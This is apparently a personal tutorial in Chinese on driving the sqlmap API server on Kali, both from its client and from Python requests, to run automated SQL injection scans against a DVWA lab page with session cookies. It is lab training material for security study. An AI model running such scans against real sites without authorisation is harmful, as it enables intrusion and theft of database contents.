Sqlmap API作用
客户端调用服务端的Sqlmap API,可实现批量同时扫描疑似SQL注入点,具有一定的高效性
linux下Sqlmap使用
建立服务端
使用kali进行学习
1.进入到/usr/share/sqlmap目录
2.运行sqlmapapi.py
命令如下:
cd /usr/share/sqlmap
python sqlmapapi.py -s
sqlmapapi.py后可加参数如下:
客户端调用
1.进入到/usr/share/sqlmap目录
2.运行sqlmapapi.py
命令如下:
cd /usr/share/sqlmap
python sqlmapapi.py -c
使用Sqlmap进行检测
api使用参数如下:
简单使用DVWA试验:
1.建立任务
new -u "http://192.168.142.129/dvwa/vulnerabilities/sqli/?id=1&Submit=sumbit" --cookie="security=low; PHPSESSID=add73afaf6f1b7a2664cb3043d37fc09"
2.查看状态
terminated表示检测完毕
3.显示数据
Python下使用Sqlmap
kali下安装python2的requests模块:
1.安装pip
sudo apt-get install python-pip
2.安装requests
sudo pip install requests
导入模块
import requests
import json #输出json格式数据
创建任务
r = requests.session()
datas = r.get("http://127.0.0.1:8775/task/new")
查看任务id
datas.json()
查看选项
datas = r.get("http://127.0.0.1:8775/option/bce5c82e269051de/list")
datas.json()
配置参数
datas = r.post("http://127.0.0.1:8775/option/bce5c82e269051de/set",data=json.dumps({'url':'http://192.168.177.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#','cookie':'security=low; PHPSESSID=f06638edc54f08c420717a3a22e8b6b9'}),headers={'Content-Type':'application/json'})
datas.json()
查看参数设置情况
r.post("http://127.0.0.1:8775/option/bce5c82e269051de/get",data=json.dumps({'url':'http://192.168.177.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#','cookie':'security=low; PHPSESSID=f06638edc54f08c420717a3a22e8b6b9'}),headers={'Content-Type':'application/json'})
datas.json()
开始任务
datas = r.post("http://127.0.0.1:8775/scan/bce5c82e269051de/start",data=json.dumps({'url':'http://192.168.177.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#','cookie':'security=low; PHPSESSID=f06638edc54f08c420717a3a22e8b6b9'}),headers={'Content-Type':'application/json'})
查看状态
r.get("http://127.0.0.1:8775/scan/bce5c82e269051de/status",data=json.dumps({'url':'http://192.168.177.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#','cookie':'security=low; PHPSESSID=f06638edc54f08c420717a3a22e8b6b9'}),headers={'Content-Type':'application/json'})
获取数据
datas = r.get("http://127.0.0.1:8775/scan/bce5c82e269051de/data")
datas.json()
总结
日后一定写个脚本